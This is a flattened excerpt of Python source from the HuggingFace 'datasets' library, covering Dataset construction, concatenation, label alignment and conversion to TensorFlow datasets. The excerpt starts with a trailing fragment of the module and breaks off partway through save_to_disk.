during alignment label2id = {k.lower(): v for k, v in label2id.items()} int2str_function = label_feature.int2str def process_label_ids(batch): dset_label_names = [ int2str_function(label_id).lower() if label_id is not None else None for label_id in batch[label_column] ] batch[label_column] = [ label2id[label_name] if label_name is not None else None for label_name in dset_label_names ] return batch features = self.features.copy() features[label_column] = ClassLabel(num_classes=len(label_names), names=label_names) return self.map(process_label_ids, features=features, batched=True, desc="Aligning the labels") def concatenate_datasets( dsets: List[Dataset], info: Optional[Any] = None, split: Optional[Any] = None, axis: int = 0, ): """ Converts a list of :class:`Dataset` with the same schema into a single :class:`Dataset`. Args: dsets (:obj:`List[datasets.Dataset]`): List of Datasets to concatenate. info (:class:`DatasetInfo`, optional): Dataset information, like description, citation, etc. split (:class:`NamedSplit`, optional): Name of the dataset split. axis (``{0, 1}``, default ``0``, meaning over rows): Axis to concatenate over, where ``0`` means over rows (vertically) and ``1`` means over columns (horizontally). .. versionadded:: 1.6.0 """ # Ignore datasets with no rows if any(dset.num_rows > 0 for dset in dsets): dsets = [dset for dset in dsets if dset.num_rows > 0] else: # Return first dataset if all datasets are empty return dsets[0] # Perform checks (and a potentional cast if axis=0) if axis == 0: _check_if_features_can_be_aligned([dset.features for dset in dsets]) else: if not all([dset.num_rows == dsets[0].num_rows for dset in dsets]): raise ValueError("Number of rows must match for all datasets") _check_column_names([col_name for dset in dsets for col_name in dset._data.column_names]) # Find common format or reset format format = dsets[0].format if any(dset.format != format for dset in dsets): format = {} logger.info("Some of the datasets have disparate format. Resetting the format of the concatenated dataset.") def apply_offset_to_indices_table(table, offset): if offset == 0: return table else: array = table["indices"] new_array = pc.add(array, pa.scalar(offset, type=pa.uint64())) return InMemoryTable.from_arrays([new_array], names=["indices"]) # Concatenate indices if they exist if any(dset._indices is not None for dset in dsets): if axis == 0: # Datasets with no indices tables are replaced with a dataset with an indices table in memory. # Applying an offset to an indices table also brings the table in memory. indices_tables = [] for i in range(len(dsets)): if dsets[i]._indices is None: dsets[i] = dsets[i].select(range(len(dsets[i]))) indices_tables.append(dsets[i]._indices) # An offset needs to be applied to the indices before concatenating offset = 0 for i in range(len(dsets)): indices_tables[i] = apply_offset_to_indices_table(indices_tables[i], offset) offset += len(dsets[i]._data) # Concatenate indices indices_tables = [t for t in indices_tables if len(t) > 0] if indices_tables: indices_table = concat_tables(indices_tables) else: indices_table = InMemoryTable.from_batches([], schema=pa.schema({"indices": pa.int64()})) else: if len(dsets) == 1: indices_table = dsets[0]._indices else: for i in range(len(dsets)): dsets[i] = dsets[i].flatten_indices() indices_table = None else: indices_table = None table = concat_tables([dset._data for dset in dsets], axis=axis) if axis == 0: features_list = _align_features([dset.features for dset in dsets]) else: features_list = [dset.features for dset in dsets] table = update_metadata_with_features(table, {k: v for features in features_list for k, v in features.items()}) # Concatenate infos if info is None: info = DatasetInfo.from_merge([dset.info for dset in dsets]) fingerprint = update_fingerprint( "".join(dset._fingerprint for dset in dsets), concatenate_datasets, {"info": info, "split": split} ) # Make final concatenated dataset concatenated_dataset = Dataset( table, info=info, split=split, indices_table=indices_table, fingerprint=fingerprint, ) concatenated_dataset.set_format(**format) return concatenated_dataset # This is outside Dataset.filter as it needs to be picklable for multiprocessing def get_indices_from_mask_function( function: Callable, batched: bool, with_indices: bool, input_columns: Optional[Union[str, List[str]]], indices_mapping: Optional[Table] = None, *args, **fn_kwargs, ): if batched: # we extract indices from args *inputs, indices = args if with_indices: mask = function(*inputs, indices, **fn_kwargs) else: mask = function(*inputs, **fn_kwargs) else: # we get batched data (to do less look-ups) but `function` only accepts one example # therefore we need to call `function` on each example of the batch to get the mask *inputs, indices = args mask = [] if input_columns is None: # inputs only contains a batch of examples batch: dict = inputs[0] num_examples = len(batch[next(iter(batch.keys()))]) for i in range(num_examples): example = {key: batch[key][i] for key in batch} mask.append( function(example, indices[i], **fn_kwargs) if with_indices else function(example, **fn_kwargs) ) else: # inputs is a list of columns columns: List[List[Any]] = inputs num_examples = len(columns[0]) for i in range(num_examples): input = [column[i] for column in columns] mask.append( function(*input, indices[i], **fn_kwargs) if with_indices else function(*input, **fn_kwargs) ) indices_array = [i for i, to_keep in zip(indices, mask) if to_keep] if indices_mapping is not None: indices_array = pa.array(indices_array, type=pa.uint64()) indices_array = indices_mapping.column(0).take(indices_array) indices_array = indices_array.to_pylist() return {"indices": indices_array}
# coding=utf-8 # Copyright 2020 The HuggingFace Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Lint as: python3 """ Simple Dataset wrapping an Arrow Table.""" import contextlib import copy import json import os import shutil import tempfile import weakref from collections import Counter, UserDict from collections.abc import Mapping from copy import deepcopy from dataclasses import asdict from functools import partial, wraps from io import BytesIO from math import ceil, floor from pathlib import Path from typing import ( TYPE_CHECKING, Any, BinaryIO, Callable, Dict, Iterable, Iterator, List, Optional, Tuple, Union, overload, ) import fsspec import numpy as np import pandas as pd import pyarrow as pa import pyarrow.compute as pc from huggingface_hub import HfApi, HfFolder from multiprocess import Pool, RLock from requests import HTTPError from tqdm.auto import tqdm from . import config, utils from .arrow_reader import ArrowReader from .arrow_writer import ArrowWriter, OptimizedTypedSequence from .features import ClassLabel, Features, FeatureType, Sequence, Value, _ArrayXD, pandas_types_mapper from .filesystems import extract_path_from_uri, is_remote_filesystem from .fingerprint import ( fingerprint_transform, generate_fingerprint, generate_random_fingerprint, get_temporary_cache_files_directory, is_caching_enabled, maybe_register_dataset_for_temp_dir_deletion, update_fingerprint, ) from .formatting import format_table, get_format_type_from_alias, get_formatter, query_table from .info import DatasetInfo from .search import IndexableMixin from .splits import NamedSplit, Split, SplitInfo from .table import ( InMemoryTable, MemoryMappedTable, Table, cast_with_sliced_list_support, concat_tables, list_table_cache_files, ) from .tasks import TaskTemplate from .utils import logging from .utils.deprecation_utils import deprecated from .utils.file_utils import estimate_dataset_size from .utils.info_utils import is_small_dataset from .utils.py_utils import unique_values from .utils.typing import PathLike if TYPE_CHECKING: from .dataset_dict import DatasetDict logger = logging.get_logger(__name__) class LazyDict(UserDict): def __init__(self, data, features=None, decoding=True): self.data = data self.features = ( {key: feature for key, feature in features.items() if hasattr(feature, "decode_example")} if features else {} ) self.decoding = decoding def values(self): return self.data.values() def items(self): return self.data.items() class Example(LazyDict): def __getitem__(self, key): value = super().__getitem__(key) if self.decoding and self.features and key in self.features: value = self.features[key].decode_example(value) if value is not None else None self[key] = value del self.features[key] return value class Batch(LazyDict): def __getitem__(self, key): values = super().__getitem__(key) if self.decoding and self.features and key in self.features: values = [self.features[key].decode_example(value) if value is not None else None for value in values] self[key] = values del self.features[key] return values class DatasetInfoMixin: """This base class exposes some attributes of DatasetInfo at the base level of the Dataset for easy access. """ def __init__(self, info: DatasetInfo, split: Optional[NamedSplit]): self._info = info self._split = split @property def info(self): """:class:`datasets.DatasetInfo` object containing all the metadata in the dataset.""" return self._info @property def split(self): """:class:`datasets.NamedSplit` object corresponding to a named dataset split.""" return self._split @property def builder_name(self) -> str: return self._info.builder_name @property def citation(self) -> str: return self._info.citation @property def config_name(self) -> str: return self._info.config_name @property def dataset_size(self) -> Optional[int]: return self._info.dataset_size @property def description(self) -> str: return self._info.description @property def download_checksums(self) -> Optional[dict]: return self._info.download_checksums @property def download_size(self) -> Optional[int]: return self._info.download_size @property def features(self) -> Features: return self._info.features @property def homepage(self) -> Optional[str]: return self._info.homepage @property def license(self) -> Optional[str]: return self._info.license @property def size_in_bytes(self) -> Optional[int]: return self._info.size_in_bytes @property def supervised_keys(self): return self._info.supervised_keys @property def task_templates(self): return self._info.task_templates @property def version(self): return self._info.version class TensorflowDatasetMixin: _TF_DATASET_REFS = set() @staticmethod def _get_output_signature(dataset: "Dataset", collate_fn: Callable, collate_fn_args: dict, batch_size: int): """Private method used by `to_tf_dataset()` to find the shapes and dtypes of samples from this dataset after being passed through the collate_fn. Args: dataset (:obj:`Dataset`): Dataset to load samples from. collate_fn(:obj:`bool`): Shuffle the dataset order when loading. Recommended True for training, False for validation/evaluation. collate_fn(:obj:`Callable`): A function or callable object (such as a `DataCollator`) that will collate lists of samples into a batch. collate_fn_args (:obj:`Dict`): A `dict` of keyword arguments to be passed to the `collate_fn`. batch_size (:obj:`int`): The size of batches loaded from the dataset. Used for shape inference. Returns: :obj:`dict`: Dict mapping column names to tf dtypes :obj:`dict`: Dict mapping column names to tf.TensorSpec objects """ if config.TF_AVAILABLE: import tensorflow as tf else: raise ImportError("Called a Tensorflow-specific function but Tensorflow is not installed.") # Tensorflow needs an exact signature for tf.numpy_function, so # we need to figure out what's coming back in advance. The only way to do this is to run a test batch - # the collator may add columns, so we can't figure it out just by inspecting the dataset. if len(dataset) == 0: raise ValueError("Unable to get the output signature because the dataset is empty.") test_batch_size = min(len(dataset), 4) test_batch = dataset[:test_batch_size] test_batch = [{key: value[i] for key, value in test_batch.items()} for i in range(test_batch_size)] test_batch = collate_fn(test_batch, **collate_fn_args) columns_to_dtypes = {} for key, array in test_batch.items(): # In case the collate_fn returns something strange array = np.array(test_batch[key]) if np.issubdtype(array.dtype, np.integer) or array.dtype == np.bool: cast_dtype = np.int64 elif np.issubdtype(array.dtype, np.number): cast_dtype = np.float32 else: continue # Probably a string, but whatever it is will cause Tensorflow to shit the bed, so drop it columns_to_dtypes[key] = cast_dtype signatures = {} for column, col_feature in dataset.features.items(): if column not in columns_to_dtypes: continue shape = [] shape_feature = col_feature while not isinstance(shape_feature, (Value, ClassLabel)): if isinstance(shape_feature, _ArrayXD): shape.extend(list(shape_feature.shape)) break elif isinstance(shape_feature, Sequence): shape.insert(0, shape_feature.length) shape_feature = shape_feature.feature else: raise ValueError( f"Couldn't parse feature {column} with type {type(col_feature)}! " "This may indicate a column was included with an unusual datatype " "that we were unable to process correctly. " "If you're getting this error with one of our datasets, and you're " "sure the column should be convertable to tf.Tensor, please " "file an issue at github.com/huggingface/datasets and tag " "@rocketknight1." ) shape = [batch_size] + shape shape = [dim if dim != -1 else None for dim in shape] signatures[column] = tf.TensorSpec(shape=shape, dtype=tf.dtypes.as_dtype(columns_to_dtypes[column])) # Catching columns added by the collate_fn, such as MLM labels for column, tensor in test_batch.items(): if column in signatures: continue if column.startswith("label"): if "input_ids" in signatures and test_batch[column].shape == test_batch["input_ids"].shape: shape = signatures["input_ids"].shape else: # If this doesn't look like LM labels that got added by the collate_fn, let's not say anything # about the dimensions we're unsure of shape = [batch_size] + [None for dim in tensor.shape.as_list()[1:]] else: # If this doesn't look like LM labels that got added by the collate_fn, let's not say anything # about the dimensions we're unsure of shape = [batch_size] + [None for dim in tensor.shape.as_list()[1:]] signatures[column] = tf.TensorSpec(shape=shape, dtype=tensor.dtype) return columns_to_dtypes, signatures def to_tf_dataset( self, columns: Union[str, List[str]], batch_size: int, shuffle: bool, collate_fn: Callable, drop_remainder: bool = None, collate_fn_args: Dict[str, Any] = None, label_cols: Union[str, List[str]] = None, dummy_labels: bool = False, prefetch: bool = True, ): """Create a tf.data.Dataset from the underlying Dataset. This tf.data.Dataset will load and collate batches from the Dataset, and is suitable for passing to methods like model.fit() or model.predict(). Args: columns (:obj:`List[str]` or :obj:`str`): Dataset column(s) to load in the tf.data.Dataset. In general, only columns that the model can use as input should be included here (numeric data only). batch_size (:obj:`int`): Size of batches to load from the dataset. shuffle(:obj:`bool`): Shuffle the dataset order when loading. Recommended True for training, False for validation/evaluation. drop_remainder(:obj:`bool`, default ``None``): Drop the last incomplete batch when loading. If not provided, defaults to the same setting as shuffle. collate_fn(:obj:`Callable`): A function or callable object (such as a `DataCollator`) that will collate lists of samples into a batch. collate_fn_args (:obj:`Dict`, optional): An optional `dict` of keyword arguments to be passed to the `collate_fn`. label_cols (:obj:`List[str]` or :obj:`str`, default ``None``): Dataset column(s) to load as labels. Note that many models compute loss internally rather than letting Keras do it, in which case it is not necessary to actually pass the labels here, as long as they're in the input `columns`. dummy_labels (:obj:`bool`, default ``False``): If no `label_cols` are set, output an array of "dummy" labels with each batch. This can avoid problems with `fit()` or `train_on_batch()` that expect labels to be a Tensor or np.ndarray, but should (hopefully) not be necessary with our standard train_step(). prefetch (:obj:`bool`, default ``True``): Whether to run the dataloader in a separate thread and maintain a small buffer of batches for training. Improves performance by allowing data to be loaded in the background while the model is training. Returns: :class:`tf.data.Dataset` """ if config.TF_AVAILABLE: import tensorflow as tf else: raise ImportError("Called a Tensorflow-specific function but Tensorflow is not installed.") if collate_fn_args is None: collate_fn_args = {} if label_cols is None: label_cols = [] elif isinstance(label_cols, str): label_cols = [label_cols] elif len(set(label_cols)) < len(label_cols): raise ValueError("List of label_cols contains duplicates.") if not columns: raise ValueError("Need to specify at least one column.") elif isinstance(columns, str): columns = [columns] elif len(set(columns)) < len(columns): raise ValueError("List of columns contains duplicates.") if label_cols is not None: cols_to_retain = columns + label_cols else: cols_to_retain = columns if "label" in cols_to_retain or "labels" in cols_to_retain or "label_ids" in cols_to_retain: cols_to_retain += ["labels", "label", "label_ids"] # Don't accidentally drop any labels with other names! cols_to_retain = list(set(cols_to_retain)) # Remove any duplicates if drop_remainder is None: # We assume that if you're shuffling it's the train set, so we drop the remainder unless told not to drop_remainder = shuffle retained_columns = [key for key in self.features.keys() if key in cols_to_retain] dataset = self.with_format("numpy", columns=retained_columns) columns_to_dtypes, output_signature = self._get_output_signature( dataset, collate_fn, collate_fn_args, batch_size=batch_size if drop_remainder else None ) all_columns = list(columns_to_dtypes.keys()) all_dtypes = list(columns_to_dtypes.values()) def np_get_batch(indices): batch = dataset[indices] actual_size = len(list(batch.values())[0]) # Get the length of one of the arrays, assume all same # Our collators expect a list of dicts, not a dict of lists/arrays, so we invert batch = [{key: value[i] for key, value in batch.items()} for i in range(actual_size)] batch = collate_fn(batch, **collate_fn_args) out_batch = [] for col, cast_dtype in columns_to_dtypes.items(): # In case the collate_fn returns something strange array = np.array(batch[col]) array = array.astype(cast_dtype) out_batch.append(array) return out_batch @tf.function(input_signature=[tf.TensorSpec(None, tf.int64)]) def fetch_function(indices): output = tf.numpy_function( # This works because dictionaries always output in insertion order np_get_batch, inp=[indices], Tout=[tf.dtypes.as_dtype(dtype) for dtype in all_dtypes], ) return {key: output[i] for i, key in enumerate(all_columns)} tf_dataset = tf.data.Dataset.from_tensor_slices(np.arange(len(dataset), dtype=np.int64)) if shuffle: tf_dataset = tf_dataset.shuffle(len(dataset)) def ensure_shapes(input_dict): return {key: tf.ensure_shape(val, output_signature[key].shape) for key, val in input_dict.items()} tf_dataset = tf_dataset.batch(batch_size, drop_remainder=drop_remainder).map(fetch_function).map(ensure_shapes) if label_cols: def split_features_and_labels(input_batch): if "labels" in columns or "label_ids" in columns or "label" in columns: columns.append("labels") if "labels" in label_cols or "label_ids" in label_cols or "label" in label_cols: label_cols.append("labels") # Some data collators add columns, so our logic is that newly added columns should go # into the input dict unless the user asked for them in labels instead features = { key: tensor for key, tensor in input_batch.items() if key in columns or key not in label_cols } labels = {key: tensor for key, tensor in input_batch.items() if key in label_cols} if len(features) == 1: features = list(features.values())[0] if len(labels) == 1: labels = list(labels.values())[0] return features, labels tf_dataset = tf_dataset.map(split_features_and_labels) elif len(columns) == 1: tf_dataset = tf_dataset.map(lambda x: list(x.values())[0]) if dummy_labels and not label_cols: def add_dummy_labels(input_batch): return input_batch, tf.zeros(tf.shape(input_batch[columns[0]])[0]) tf_dataset = tf_dataset.map(add_dummy_labels) if prefetch: tf_dataset = tf_dataset.prefetch(tf.data.experimental.AUTOTUNE) # Remove a reference to the open Arrow file on delete def cleanup_callback(ref): dataset.__del__() self._TF_DATASET_REFS.remove(ref) self._TF_DATASET_REFS.add(weakref.ref(tf_dataset, cleanup_callback)) return tf_dataset class DatasetTransformationNotAllowedError(Exception): pass def transmit_format(func): """Wrapper for dataset transforms that recreate a new Dataset to transmit the format of the original dataset to the new dataset""" @wraps(func) def wrapper(*args, **kwargs): if args: self: "Dataset" = args[0] args = args[1:] else: self: "Dataset" = kwargs.pop("self") # don't use self.format since it returns a list of columns for 'columns' even if self_format_columns is None unformatted_columns = set(self.column_names) - set(self._format_columns or []) self_format = { "type": self._format_type, "format_kwargs": self._format_kwargs, "columns": self._format_columns, "output_all_columns": self._output_all_columns, } # apply actual function out: Union["Dataset", "DatasetDict"] = func(self, *args, **kwargs) datasets: List["Dataset"] = list(out.values()) if isinstance(out, dict) else [out] # re-apply format to the output for dataset in datasets: new_format = self_format.copy() if new_format["columns"] is not None: # new formatted columns = (columns - previously unformatted columns) # sort the columns to have a deterministic list of columns that we can compare with `out_format` new_format["columns"] = sorted(set(dataset.column_names) - unformatted_columns) out_format = { "type": dataset._format_type, "format_kwargs": dataset._format_kwargs, "columns": sorted(dataset._format_columns) if dataset._format_columns is not None else None, "output_all_columns": dataset._output_all_columns, } if out_format != new_format: # only apply if there's a change not to update the fingerprint for nothing dataset.set_format(**new_format) return out wrapper._decorator_name_ = "transmit_format" return wrapper def transmit_tasks(func): """Wrapper for dataset transforms that recreate a new Dataset to transmit the task templates of the original dataset to the new dataset""" @wraps(func) def wrapper(*args, **kwargs): if args: self: "Dataset" = args[0] args = args[1:] else: self: "Dataset" = kwargs.pop("self") # apply actual function out: Union["Dataset", "DatasetDict"] = func(self, *args, **kwargs) datasets: List["Dataset"] = list(out.values()) if isinstance(out, dict) else [out] for dataset in datasets: # Remove task templates if a column mapping of the template is no longer valid if self.info.task_templates is not None: dataset.info.task_templates = [ template for template in self.info.task_templates if all(dataset.features.get(k) == self.features.get(k) for k in template.column_mapping.keys()) ] return out wrapper._decorator_name_ = "transmit_tasks" return wrapper def update_metadata_with_features(table: Table, features: Features): """To be used in dataset transforms that modify the features of the dataset, in order to update the features stored in the metadata of its schema.""" features = Features({col_name: features[col_name] for col_name in table.column_names}) if table.schema.metadata is None or "huggingface".encode("utf-8") not in table.schema.metadata: pa_metadata = ArrowWriter._build_metadata(DatasetInfo(features=features)) else: metadata = json.loads(table.schema.metadata["huggingface".encode("utf-8")].decode()) if "info" not in metadata: metadata["info"] = asdict(DatasetInfo(features=features)) else: metadata["info"]["features"] = asdict(DatasetInfo(features=features))["features"] pa_metadata = {"huggingface": json.dumps(metadata)} table = table.replace_schema_metadata(pa_metadata) return table def _check_table(table) -> Table: """We check the table type to make sure it's an instance of :class:`datasets.table.Table`""" if isinstance(table, pa.Table): # for a pyarrow table, we can just consider it as a in-memory table # this is here for backward compatibility return InMemoryTable(table) elif isinstance(table, Table): return table else: raise TypeError(f"Expected a pyarrow.Table or a datasets.table.Table object, but got {table}.") def _check_column_names(column_names: List[str]): """Check the column names to make sure they don't contain duplicates.""" counter = Counter(column_names) if not all(count == 1 for count in counter.values()): duplicated_columns = [col for col in counter if counter[col] > 1] raise ValueError(f"The table can't have duplicated columns but columns {duplicated_columns} are duplicated.") def _check_if_features_can_be_aligned(features_list: List[Features]): """Check if the dictionaries of features can be aligned. Two dictonaries of features can be aligned if the keys they share have the same type or some of them is of type `Value("null")`. """ name2feature = {} for features in features_list: for k, v in features.items(): if k not in name2feature or (isinstance(name2feature[k], Value) and name2feature[k].dtype == "null"): name2feature[k] = v for features in features_list: for k, v in features.items(): if not (isinstance(v, Value) and v.dtype == "null") and name2feature[k] != v: raise ValueError( f'The features can\'t be aligned because the key {k} of features {features} has unexpected type - {v} (expected either {name2feature[k]} or Value("null").' ) def _align_features(features_list: List[Features]) -> List[Features]: """Align dictionaries of features so that the keys that are found in multiple dictionaries share the same feature.""" name2feature = {} for features in features_list: for k, v in features.items(): if k not in name2feature or (isinstance(name2feature[k], Value) and name2feature[k].dtype == "null"): name2feature[k] = v return [Features({k: name2feature[k] for k in features.keys()}) for features in features_list] class NonExistentDatasetError(Exception): """Used when we expect the existence of a dataset""" pass class Dataset(DatasetInfoMixin, IndexableMixin, TensorflowDatasetMixin): """A Dataset backed by an Arrow table.""" def __init__( self, arrow_table: Table, info: Optional[DatasetInfo] = None, split: Optional[NamedSplit] = None, indices_table: Optional[Table] = None, fingerprint: Optional[str] = None, ): info = info.copy() if info is not None else DatasetInfo() DatasetInfoMixin.__init__(self, info=info, split=split) IndexableMixin.__init__(self) self._data: Table = _check_table(arrow_table) self._indices: Optional[Table] = _check_table(indices_table) if indices_table is not None else None maybe_register_dataset_for_temp_dir_deletion(self) self._format_type: Optional[str] = None self._format_kwargs: dict = {} self._format_columns: Optional[list] = None self._output_all_columns: bool = False self._fingerprint: str = fingerprint # Read metadata if self._data.schema.metadata is not None and "huggingface".encode("utf-8") in self._data.schema.metadata: metadata = json.loads(self._data.schema.metadata["huggingface".encode("utf-8")].decode()) if "info" in metadata and self.info.features is None: # try to load features from the arrow file metadata self._info.features = DatasetInfo.from_dict(metadata["info"]).features if ( "fingerprint" in metadata and self._fingerprint is None ): # try to load fingerprint from the arrow file metadata self._fingerprint = metadata["fingerprint"] # Infer features if None inferred_features = Features.from_arrow_schema(arrow_table.schema) if self.info.features is None: self.info.features = inferred_features else: # make sure the nested columns are in the right order self.info.features = self.info.features.reorder_fields_as(inferred_features) # Infer fingerprint if None if self._fingerprint is None: self._fingerprint = generate_fingerprint(self) # Sanity checks if self.features is None: raise ValueError("Features can't be None in a Dataset object") if self._fingerprint is None: raise ValueError("Fingerprint can't be None in a Dataset object") if self.info.features.type != inferred_features.type: raise ValueError( f"External features info don't match the dataset:\nGot\n{self.info.features}\nwith type\n{self.info.features.type}\n\nbut expected something like\n{inferred_features}\nwith type\n{inferred_features.type}" ) if self._indices is not None: if not pa.types.is_unsigned_integer(self._indices.column(0)[0].type): raise ValueError( f"indices must be an Arrow table of unsigned integers, current type is {self._indices.column(0)[0].type}" ) _check_column_names(self._data.column_names) self._data = update_metadata_with_features(self._data, self.features) @classmethod def from_file( cls, filename: str, info: Optional[DatasetInfo] = None, split: Optional[NamedSplit] = None, indices_filename: Optional[str] = None, in_memory: bool = False, ) -> "Dataset": """Instantiate a Dataset backed by an Arrow table at filename. Args: filename (:obj:`str`): File name of the dataset. info (:class:`DatasetInfo`, optional): Dataset information, like description, citation, etc. split (:class:`NamedSplit`, optional): Name of the dataset split. indices_filename (:obj:`str`, optional): File names of the indices. in_memory (:obj:`bool`, default ``False``): Whether to copy the data in-memory. Returns: :class:`Dataset` """ table = ArrowReader.read_table(filename, in_memory=in_memory) if indices_filename is not None: indices_pa_table = ArrowReader.read_table(indices_filename, in_memory=in_memory) else: indices_pa_table = None return cls( arrow_table=table, info=info, split=split, indices_table=indices_pa_table, ) @classmethod def from_buffer( cls, buffer: pa.Buffer, info: Optional[DatasetInfo] = None, split: Optional[NamedSplit] = None, indices_buffer: Optional[pa.Buffer] = None, ) -> "Dataset": """Instantiate a Dataset backed by an Arrow buffer. Args: buffer (:obj:`pyarrow.Buffer`): Arrow buffer. info (:class:`DatasetInfo`, optional): Dataset information, like description, citation, etc. split (:class:`NamedSplit`, optional): Name of the dataset split. indices_buffer (:obj:`pyarrow.Buffer`, optional): Indices Arrow buffer. Returns: :class:`Dataset` """ table = InMemoryTable.from_buffer(buffer) if indices_buffer is not None: indices_table = InMemoryTable.from_buffer(buffer) else: indices_table = None return cls(table, info=info, split=split, indices_table=indices_table) @classmethod def from_pandas( cls, df: pd.DataFrame, features: Optional[Features] = None, info: Optional[DatasetInfo] = None, split: Optional[NamedSplit] = None, ) -> "Dataset": """ Convert :obj:`pandas.DataFrame` to a :obj:`pyarrow.Table` to create a :class:`Dataset`. The column types in the resulting Arrow Table are inferred from the dtypes of the pandas.Series in the DataFrame. In the case of non-object Series, the NumPy dtype is translated to its Arrow equivalent. In the case of `object`, we need to guess the datatype by looking at the Python objects in this Series. Be aware that Series of the `object` dtype don't carry enough information to always lead to a meaningful Arrow type. In the case that we cannot infer a type, e.g. because the DataFrame is of length 0 or the Series only contains None/nan objects, the type is set to null. This behavior can be avoided by constructing explicit features and passing it to this function. Args: df (:obj:`pandas.DataFrame`): Dataframe that contains the dataset. features (:class:`Features`, optional): Dataset features. info (:class:`DatasetInfo`, optional): Dataset information, like description, citation, etc. split (:class:`NamedSplit`, optional): Name of the dataset split. Returns: :class:`Dataset` """ if info is not None and features is not None and info.features != features: raise ValueError( f"Features specified in `features` and `info.features` can't be different:\n{features}\n{info.features}" ) features = features if features is not None else info.features if info is not None else None if info is None: info = DatasetInfo() info.features = features table = InMemoryTable.from_pandas(df=df, schema=pa.schema(features.type) if features is not None else None) return cls(table, info=info, split=split) @classmethod def from_dict( cls, mapping: dict, features: Optional[Features] = None, info: Optional[Any] = None, split: Optional[Any] = None, ) -> "Dataset": """ Convert :obj:`dict` to a :obj:`pyarrow.Table` to create a :class:`Dataset`. Args: mapping (:obj:`Mapping`): Mapping of strings to Arrays or Python lists. features (:class:`Features`, optional): Dataset features. info (:class:`DatasetInfo`, optional): Dataset information, like description, citation, etc. split (:class:`NamedSplit`, optional): Name of the dataset split. Returns: :class:`Dataset` """ if info is not None and features is not None and info.features != features: raise ValueError( f"Features specified in `features` and `info.features` can't be different:\n{features}\n{info.features}" ) features = features if features is not None else info.features if info is not None else None if info is None: info = DatasetInfo() info.features = features if features is not None: mapping = features.encode_batch(mapping) mapping = { col: OptimizedTypedSequence(data, type=features.type[col].type if features is not None else None, col=col) for col, data in mapping.items() } pa_table = InMemoryTable.from_pydict(mapping=mapping) return cls(pa_table, info=info, split=split) @staticmethod def from_csv( path_or_paths: Union[PathLike, List[PathLike]], split: Optional[NamedSplit] = None, features: Optional[Features] = None, cache_dir: str = None, keep_in_memory: bool = False, **kwargs, ): """Create Dataset from CSV file(s). Args: path_or_paths (path-like or list of path-like): Path(s) of the CSV file(s). split (:class:`NamedSplit`, optional): Split name to be assigned to the dataset. features (:class:`Features`, optional): Dataset features. cache_dir (:obj:`str`, optional, default ``"~/.cache/huggingface/datasets"``): Directory to cache data. keep_in_memory (:obj:`bool`, default ``False``): Whether to copy the data in-memory. **kwargs: Keyword arguments to be passed to :meth:`pandas.read_csv`. Returns: :class:`Dataset` """ # Dynamic import to avoid circular dependency from .io.csv import CsvDatasetReader return CsvDatasetReader( path_or_paths, split=split, features=features, cache_dir=cache_dir, keep_in_memory=keep_in_memory, **kwargs ).read() @staticmethod def from_json( path_or_paths: Union[PathLike, List[PathLike]], split: Optional[NamedSplit] = None, features: Optional[Features] = None, cache_dir: str = None, keep_in_memory: bool = False, field: Optional[str] = None, **kwargs, ): """Create Dataset from JSON or JSON Lines file(s). Args: path_or_paths (path-like or list of path-like): Path(s) of the JSON or JSON Lines file(s). split (:class:`NamedSplit`, optional): Split name to be assigned to the dataset. features (:class:`Features`, optional): Dataset features. cache_dir (:obj:`str`, optional, default ``"~/.cache/huggingface/datasets"``): Directory to cache data. keep_in_memory (:obj:`bool`, default ``False``): Whether to copy the data in-memory. field (:obj:`str`, optional): Field name of the JSON file where the dataset is contained in. **kwargs: Keyword arguments to be passed to :class:`JsonConfig`. Returns: :class:`Dataset` """ # Dynamic import to avoid circular dependency from .io.json import JsonDatasetReader return JsonDatasetReader( path_or_paths, split=split, features=features, cache_dir=cache_dir, keep_in_memory=keep_in_memory, field=field, **kwargs, ).read() @staticmethod def from_parquet( path_or_paths: Union[PathLike, List[PathLike]], split: Optional[NamedSplit] = None, features: Optional[Features] = None, cache_dir: str = None, keep_in_memory: bool = False, columns: Optional[List[str]] = None, **kwargs, ): """Create Dataset from Parquet file(s). Args: path_or_paths (path-like or list of path-like): Path(s) of the Parquet file(s). split (:class:`NamedSplit`, optional): Split name to be assigned to the dataset. features (:class:`Features`, optional): Dataset features. cache_dir (:obj:`str`, optional, default ``"~/.cache/huggingface/datasets"``): Directory to cache data. keep_in_memory (:obj:`bool`, default ``False``): Whether to copy the data in-memory. columns (:obj:`List[str]`, optional): If not None, only these columns will be read from the file. A column name may be a prefix of a nested field, e.g. 'a' will select 'a.b', 'a.c', and 'a.d.e'. **kwargs: Keyword arguments to be passed to :class:`ParquetConfig`. Returns: :class:`Dataset` """ # Dynamic import to avoid circular dependency from .io.parquet import ParquetDatasetReader return ParquetDatasetReader( path_or_paths, split=split, features=features, cache_dir=cache_dir, keep_in_memory=keep_in_memory, columns=columns, **kwargs, ).read() @staticmethod def from_text( path_or_paths: Union[PathLike, List[PathLike]], split: Optional[NamedSplit] = None, features: Optional[Features] = None, cache_dir: str = None, keep_in_memory: bool = False, **kwargs, ): """Create Dataset from text file(s). Args: path_or_paths (path-like or list of path-like): Path(s) of the text file(s). split (:class:`NamedSplit`, optional): Split name to be assigned to the dataset. features (:class:`Features`, optional): Dataset features. cache_dir (:obj:`str`, optional, default ``"~/.cache/huggingface/datasets"``): Directory to cache data. keep_in_memory (:obj:`bool`, default ``False``): Whether to copy the data in-memory. **kwargs: Keyword arguments to be passed to :class:`TextConfig`. Returns: :class:`Dataset` """ # Dynamic import to avoid circular dependency from .io.text import TextDatasetReader return TextDatasetReader( path_or_paths, split=split, features=features, cache_dir=cache_dir, keep_in_memory=keep_in_memory, **kwargs ).read() def __del__(self): if hasattr(self, "_data"): del self._data if hasattr(self, "_indices"): del self._indices def __enter__(self): return self def __exit__(self, exc_type, exc_val, exc_tb): # Here `del` is used to del the pyarrow tables. This properly closes the files used for memory mapped tables self.__del__() def save_to_disk(self, dataset_path: str, fs=None): """ Saves a dataset to a dataset directory, or in a filesystem using either :class:`~filesystems.S3FileSystem` or any implementation of ``fsspec.spec.AbstractFileSystem``. Args: dataset_path (:obj:`str`): Path (e.g. `dataset/train`) or remote URI (e.g. `s3://my-bucket/dataset/train`) of the dataset directory where the dataset will be saved to. fs (:class:`~filesystems.S3FileSystem`, 